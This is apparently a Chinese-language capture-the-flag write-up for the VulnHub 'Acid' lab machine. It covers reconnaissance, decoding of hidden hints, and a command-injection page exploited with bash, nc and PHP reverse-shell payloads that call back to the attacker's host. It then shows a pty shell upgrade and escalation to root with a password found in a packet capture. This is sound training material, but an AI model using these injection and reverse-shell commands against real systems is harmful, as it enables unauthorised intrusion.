简介
下载链接
https://download.vulnhub.com/acid/Acid.rar
靶机说明
Welcome to the world of Acid.
Fairy tails uses secret keys to open the magical doors.
欢迎来到酸的世界。童话故事需要使用秘密钥匙打开魔法门。
目标
获得root权限和flag。
运行环境
- 靶机配置:该虚拟机完全基于Web,提取rar并使用VMplayer运行vmx,网络连接方式设置为net,靶机自动获取IP。
- 攻击机配置:同网段下有Windows攻击机,安装有Burpsuit、nc、Python2.7、DirBuster、御剑等渗透工具。
信息收集
- ip发现
启用Acid虚拟机,由于网络设置为net模式,使用Nmap扫描VMware Network Adapter VMnet8网卡的NAT网段,即可找到虚机IP,扫描结果保存到txt文件,命令:
nmap -sP 192.168.64.0/24 -oN acid-ip.txt
获得目标ip 192.168.64.153
- 端口扫描
使用nmap扫描1-65535全端口,并做服务指纹识别,扫描结果保存到txt文件,命令:
map -p1-65535 -sV -oN acid-port.txt 192.168.64.153
目标主机的33447端口发现web服务,web服务器是Apache2.4.10,操作系统ubuntu。
http://192.168.64.153:33447
进入主页:
- 服务识别
只发现web服务和Apache,只能从web漏洞或者Apache漏洞入手(如有漏洞):
端口:Tcp 33447
底层服务:Apache2.4.10
操作系统:Ubuntu
漏洞挖掘的详细思路
- web挖掘思路:
(1) 查看每个网页的源码,看是否有提示;
(2) 暴破目录,用御剑或DirBuster,看是否有新网页,找新网页的漏洞;
- Apache挖掘思路:
(1) 寻找Apache2.4.10有无已知漏洞可利用:没有发现可直接利用的漏洞。
(2) 到www.exploit-db.com查询有无exp:没有找到exp。
(3) Nessus扫描一下主机漏洞:没有扫描出漏洞。
- 实在找不到漏洞:单用户模式进入Ubuntu,看源码吧。
- 步骤1:首先看主页源码,发现提示:0x643239334c6d70775a773d3d
0x是16进制编码,将值643239334c6d70775a773d3d进行ASCII hex转码,变成:d293LmpwZw==
发现是base64编码,再进行解码,得到图片信息 wow.jpg
这时可以根据经验在首页直接加目录打:/image/wow.jpg 或者 /images/wow.jpg 或者 /icon/wow.jpg 网站的图片目录通常是这样命名。也可以利用dirbuster进行目录爆破,得到图片目录images。
- 访问
http://192.168.64.153:33447/images/wow.jpg
得到图片:
- 将图片保存到本地,用Notepad++打开,发现最下边有提示
将3761656530663664353838656439393035656533376631366137633631306434进行ASCII hex转码,得到 7aee0f6d588ed9905ee37f16a7c610d4,这是一串md5。
去cmd5解密,得到63425,推测是一个密码或者ID。
- 步骤2:使用Dirbuster进行目录暴破:
查看暴破结果:发现challenge目录,该目录下有cake.php、include.php、hacked.php,用Burpsuit挂上代理,使用Firefox然后依次访问3个文件:
- 步骤3:访问cake.php,发现需要登录后才能访问:
该页面如果看页面title或者看burpsuit的Response返回值的<title>/Magic_Box</title>,会发现有/Magic_Box目录存在,先看其他页面。
点击login会跳转到index.php登录页面,需要email和密码才能登录:
- 步骤4:访问include.php,这是一个文件包含漏洞页面:
在输入框中输入 /etc/passwd 测试存在文件包含,Burpsuit显示response包如下:
想文件包含拿shell,但没有文件上传点,之前发现的wow.jpg中无木马可包含。先继续看hacked.php。
- 步骤5:访问cake.php,需要输入ID,测试下之前从wow.jpg解密出来的数字:63425
然后,什么也没有发生,看来ID不对,或者需要先通过index页面输入email和密码登录。
- 步骤6:找注入,把发现的几个页面都送入AWVS扫描了漏洞,未发现注入。
- 步骤7:继续暴破发现的Magic_Box目录:发现low.php,command.php
- 步骤8:访问low.php是个空页面,访问command.php,发现命令执行界面:
可执行系统命令,输入192.168.64.1;id 查看burpsuit的response发现id命令执行成功。
获取shell
- 步骤9:利用php反弹shell。Windows开启nc,监听4444端口:
为避免转义和中断,在get、post请求中输入payload需要进行url编码。尝试bash反弹shell、nc反弹shell,如下payload都失败:
bash -i >& /dev/tcp/192.168.64.1/4444 0>&1
nc -e /bin/bash -d 192.168.64.1 4444
通过php反弹shell成功,将如下payload进行URL编码后,在burp中发送:
php -r '$sock=fsockopen("192.168.64.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
nc成功接收反弹shelll:
但是无法执行su命令,回显su: must be run from a terminal 需要一个终端。没有想出办法,最终google了一下,找到答案:用python调用本地的shell,命令:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
执行su成功:
提升权限
- 步骤10:查看有哪些的用户
cat /etc/passwd
,发现需要关注的用户有:acid,saman,root
- 步骤11:查找每个用户的文件(不显示错误)
find / -user acid 2>/dev/null
发现/sbin/raw_vs_isi/hint.pcapng文件,这是一个网络流量抓包文件,将其拷贝的kali上,用Wireshark打开:
scp /sbin/raw_vs_isi/hint.pcapng root@10.10.10.140:/root/
只看TCP协议的包,发现saman的密码:1337hax0r
- 步骤12:su提权到saman、root,获得flag
再使用sudo -i 提权到root,密码同样是1337hax0r,获得位于root目录的flag.txt。
靶场思路回顾
作者的设计思路可参考国外的一篇渗透文章:
http://resources.infosecinstitute.com/acid-server-ctf-walkthroug
h
主要突破点是:
1.两次目录暴破,第一次暴破出challenge,目录、cake.php、include.php、hacked.php,第二次暴破Magic_Box目录发现command.php。
2.发现命令执行界面后,用php反弹shell,在http中传输需对payload进行url编码。
3.su提权需要一个终端,没有经验只能Google解决了。
4.提权的方法是通过查找已知用户的文件,发现其密码,未使用exp或msf提权。
总结
1.主要收获:
(1)命令执行漏洞可使用php反弹shell, 以前都是用bash或nc。
(2)su提权需要一个终端,使用Python解决。
(3)获得shell后,多多查找各个用户文件,可能有新发现。
2.踩到的坑:
(1)文件包含漏洞,没找到利用方式,也找不到上传点,无法包含获得shell;
(2)su提权需要一个终端,没有知识储备和经验,依靠高手指导和Google搜索解决。
(3)index.php页面获得邮件用户名和密码的方法太冷门了,如果不是看国外的教程,自己无法想到。
(4)发现目录就暴破下,使用御剑默认字典不行,只能使用OWASP的暴破字典,目录暴破绕过了上面邮件用户名和口令的登录,可以一路暴破到命令执行页面。
总之,在没有google搜索和他人的指导下,自己没能独立完成,后续需要开阔思路,多多练习。